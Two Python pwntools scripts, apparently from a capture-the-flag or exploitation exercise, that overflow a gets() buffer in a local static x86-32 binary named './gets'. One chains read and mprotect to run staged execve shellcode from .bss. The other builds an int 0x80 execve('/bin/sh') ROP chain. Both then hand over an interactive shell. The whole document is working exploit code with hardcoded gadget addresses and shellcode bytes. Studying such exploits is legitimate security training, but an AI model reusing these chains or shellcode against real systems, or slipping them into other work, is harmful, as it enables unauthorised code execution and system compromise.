mprotect_exploit.py
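from pwn import *

# All addresses come from one specific non-PIE build of ./gets (the libc-like
# function addresses in the 0x0806xxxx range suggest a static binary). They
# must be re-extracted for any other build.
READ = 0x0806D5F0       # read(int fd, void *buf, size_t n)
MPROTECT = 0x0806E0F0   # mprotect(void *addr, size_t len, int prot)
PPPR = 0x80BACFE        # pop; pop; pop; ret — clears three call arguments
BSS = 0x080EB000        # page-aligned writable address used to stage shellcode
PROT_RWX = 7            # PROT_READ | PROT_WRITE | PROT_EXEC
PAD = 0x18 + 4          # buffer plus saved ebp: distance to saved eip
                        # (taken from the writeup's stack layout — confirm)

# x86-32 execve("/bin//sh", ["/bin//sh", NULL], NULL) via int 0x80, 25 bytes.
# A bytes literal is required: p32() returns bytes on Python 3, so a str
# prefix would raise TypeError when concatenated.
SHELLCODE = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    b"\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"
)


def build_payload(shellcode=SHELLCODE):
    """Return the ROP chain that stages *shellcode* in .bss and runs it.

    Chain: read(0, BSS, len) -> mprotect(BSS, len, RWX) -> return into BSS.
    mprotect needs a page-aligned address (BSS is) and the kernel rounds
    the length up to page granularity, so a 25-byte len is fine.

    Raises ValueError if the chain contains 0x0a: the vulnerable gets()
    stops at a newline and would silently truncate the chain there.
    """
    chain = [
        READ, PPPR, 0, BSS, len(shellcode),
        MPROTECT, PPPR, BSS, len(shellcode), PROT_RWX,
        BSS,
    ]
    payload = b"A" * PAD + b"".join(p32(value) for value in chain)
    if b"\n" in payload:
        raise ValueError("ROP chain contains 0x0a; gets() would truncate it")
    return payload


def main():
    """Deliver the chain, then the shellcode, and hand over the shell."""
    p = process("./gets")
    p.sendlineafter("\n", build_payload())
    # Give gets() time to return before the shellcode arrives. stdio may
    # read ahead into its own buffer, and bytes it swallows never reach the
    # raw read(0, ...) syscall in the chain.
    sleep(0.1)
    p.sendline(SHELLCODE)
    p.interactive()


if __name__ == "__main__":
    main()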
syscall_exploit.py
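from pwn import *

# All addresses come from one specific non-PIE build of ./gets and must be
# re-extracted for any other build.
GETS_PLT = 0x804F120    # gets@plt
BSS = 0x080EAF80        # writable scratch address that receives "/bin/sh"
# Gadget contents are inferred from how the chain loads registers
# (eax=0xb, ebx=&"/bin/sh", ecx=0, edx=0 is the execve convention);
# confirm each one against the gadget dump before reuse.
POP_EAX_RET = 0x080B81C6
POP_EBX_RET = 0x080481C9
POP_ECX_RET = 0x080DE955
POP_EDX_RET = 0x0806F02A
SYSCALL = 0x0806CC25    # presumably int 0x80; ret
SYS_EXECVE = 0xB        # x86-32 syscall number (not the x86-64 0x3b)
PAD = 0x18 + 4          # buffer plus saved ebp: distance to saved eip
                        # (taken from the writeup's stack layout — confirm)
# bytes literal: p32() returns bytes on Python 3, mixing in str would fail.
BINSH = b"/bin/sh\x00"


def build_payload():
    """Return the ROP chain: gets(BSS) then execve(BSS, NULL, NULL).

    After gets() returns, the pop-eax gadget doubles as the stack cleanup
    that discards the BSS argument; the second use of it loads the syscall
    number. No libc execve/system address is needed, only an int 0x80
    gadget.

    Raises ValueError if the chain contains 0x0a, because the vulnerable
    gets() would truncate the input at that byte.
    """
    chain = [
        GETS_PLT, POP_EAX_RET, BSS,      # gets(BSS); pop drops the argument
        POP_EAX_RET, SYS_EXECVE,         # eax = __NR_execve
        POP_EBX_RET, BSS,                # ebx = "/bin/sh"
        POP_ECX_RET, 0,                  # ecx = argv = NULL
        POP_EDX_RET, 0,                  # edx = envp = NULL
        SYSCALL,
    ]
    payload = b"A" * PAD + b"".join(p32(value) for value in chain)
    if b"\n" in payload:
        raise ValueError("ROP chain contains 0x0a; gets() would truncate it")
    return payload


def main():
    """Deliver the chain, then the "/bin/sh" string, and hand over the shell."""
    p = process("./gets")
    p.sendlineafter("\n", build_payload())
    # Let the first gets() return before the second line arrives so the
    # ROP-invoked gets(BSS) reads "/bin/sh" rather than the overflow remainder.
    sleep(0.1)
    # gets() copies the embedded NUL as well; the trailing newline terminates
    # the read and is not stored.
    p.sendline(BINSH)
    p.interactive()


if __name__ == "__main__":
    main()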